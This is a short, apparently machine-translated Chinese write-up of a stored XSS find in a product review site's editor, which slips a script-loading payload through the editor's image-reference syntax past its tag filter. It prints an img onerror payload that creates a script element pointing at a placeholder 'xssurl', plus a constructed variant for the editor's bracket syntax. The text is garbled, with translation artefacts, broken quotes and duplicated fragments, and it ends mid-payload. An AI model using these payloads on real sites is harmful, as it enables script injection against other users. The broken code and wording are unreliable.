山和河流充满水,没有办法
漏洞点:现场产品审查办公室初步测试
在开始时,我尝试了XSS,发现该程序已被过滤。不允许提交标签。最后一个被过滤,但被过滤
另一个黑暗的柳树和鲜花
当我看到编辑器提示IMG的外部图像参考方法时,我觉得我可以在这里做到这一点:
正常测试
让我们首先查看正常引用方法中的前端显示。该链接被带入SRC(徽标之前的文本涉及域名,编码): 1 [img | xssurl |xxxxx徽标]
带有有效载荷
将XSS有效载荷放在链接上,然后查看:
1234常规有效载荷:img src=x OneError=s=createElement('script''); body.appendChild(s); s.src='xssurl';构造有效载荷:[img | x OneError=s=s=createElement('scriptelement('script'')